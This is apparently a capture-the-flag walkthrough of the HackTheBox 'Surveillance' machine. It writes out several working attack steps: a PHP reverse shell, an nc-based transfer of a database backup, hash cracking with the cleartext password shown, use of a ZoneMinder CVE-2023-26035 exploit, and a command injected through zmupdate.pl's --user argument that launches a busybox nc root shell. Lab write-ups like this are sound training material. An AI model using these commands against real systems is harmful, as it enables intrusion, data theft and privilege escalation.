Surveillance
Intro
The box seems to be for a surveillance camera service. It does not give a clear indicator for what a foothold would be.
Discovery
The website seems to be hosted by Craft CMS. The page source does not revail anything instersting. just basic markup. demo@surveillance.htb is an email. No other links initial nmap is quite sparse
sudo nmap -sC -sV -oA nmap surveillance.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-12 22:25 CET
Nmap scan report for surveillance.htb (10.10.11.245)
Host is up (0.026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
|_ 256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Surveillance
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
We have to try some more enumeration.
http://surveillance.htb/admin/login
gives a login page.
The latest release of craft seems to be 4.6.0 Whilst the home page suggest it is running 4.4.14
In the release notes for 4.5.14 they mention: Fixed a privilege escalation vulnerability.
So this is something we have to use later on. In 4.5.12 again Fixed a privilege escalation vulnerability.
4.5.7 aswell. 4.5.6 seems to contains a RCE Fixed an RCE vulnerability.
Lets have a try at this.
Getting user
https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226
This poc first failed, but seemed to be update by the time I came back to this machine and now gives a shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Lets first setup a more stable reverse shell We started a new reverse shell using php
php -r '$sock=fsockopen("10.10.14.137",9000);exec("sh <&3 >&3 2>&3");'
We upgraded this shell and can now start looking around
The folder in which we start seem to contain mostly random web files.
By doing find .
we can quickly see all directory contents
Up we go up some directories we find a /storage
directory, we do find on that and see storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
that might be interesting.
Database dump
We setup a new netcat connection
host: nc -lp 9001 -q 1 > baseout
on the machine we then encode it using base64 and send it
machine: cat ./storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | base64 | nc 10.10.14.137 9001
On our host we can now decode it and unzip
base64 -d baseout > data.zip && unzip data.zip
Searching for a password or username
INSERT INTO `searchindex` VALUES (1,'email',0,1,' admin surveillance htb '),(1,'firstname',0,1,' matthew '),(1,'fullname',0,1,' matthew b '),(1,'lastname',0,1,' b '),(1,'slug',0,1,''),(1,'username',0,1,' admin '),(2,'slug',0,1,' home '),(2,'title',0,1,' home '),(7,'slug',0,1,' coming soon '),(7,'title',0,1,' coming soon ');
/*!40000 ALTER TABLE `searchindex` ENABLE KEYS */;
UNLOCK TABLES;
commit;
Maybe we can find matthew password somewhere
This seems like the admin entry:
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
set autocommit=0;
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
commit;
Where 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
is the password hash.
Cracking the password
Using hashid
we can to discover what type of hash it is.
hashid 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
SHA-256 seems te most likely
We can try and crack it using hashcat.
hashcat -m 1400 -a 0 hash /usr/share/wordlist/rockyou.txt
And we find it:
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490
user:matthew
pass: starcraft122490
we login via ssh.
And we get the user flag:
ff5294207dafe5b5ca1ff61f1bfc5ddb
Root
In the user dir we can not see anything special so we should try and get some enumeration on here. We upload linpeas via our default approach and run it.
Linpeas
There seems to be a second user with a console:
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash
Along with it there seems to be more nginx configuration for zm (zoneminder)
Probing arround
If we do curl localhost:8080
We get served a page of zoneminder application this will probably be our way forward.
There seems to be a poc available https://github.com/rvizx/CVE-2023-26035 If we want to use the exploit we must first forward to port to our host
ssh -L 8080:localhost:8080 matthew@surveillance.htb
Then we again setup a nc lisener
and execute the poc
nc -lvnp 9000
python root-exploit.py -t http://localhost:8080 -ip 10.10.14.137 -p 9000
And we get a shell as the zoneminder users
Root stage 2
zoneminder does have sudo rights:
sudo -l
Matching Defaults entries for zoneminder on surveillance:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User zoneminder may run the following commands on surveillance:
(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
zoneminder@surveillance:/usr/share/zoneminder/www$
It seems to be clear that we want to inject our command somewhere using one of the *pl
. We are however not allowed to create our own files. Lets see what tools we already have.
zmaudit.pl zmfilter.pl zmrecover.pl zmtrack.pl zmwatch.pl
zmcamtool.pl zmonvif-probe.pl zmstats.pl zmtrigger.pl zmx10.pl
zmcontrol.pl zmonvif-trigger.pl zmsystemctl.pl zmupdate.pl
zmdc.pl zmpkg.pl zmtelemetry.pl zmvideo.pl
These are all the perl files we can execute as root, one maybe has someway the run commands
If we audit the code a bit we find that zmupdate.pl
executes a command for which we can easily inject our own shell bits in the for of a user name.
So we create a small script with a reverse shell:
echo "busybox nc 10.10.14.137 9001 -e bash" >> privesc.sh && chmod +x privesc.sh
On our host setup a netcat lisener
nc -lnvp 9001
We then run
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/privesc.sh)'
And we get a root shell on our new netcat connection
29973ba58778775d0cffc2be10ff92fb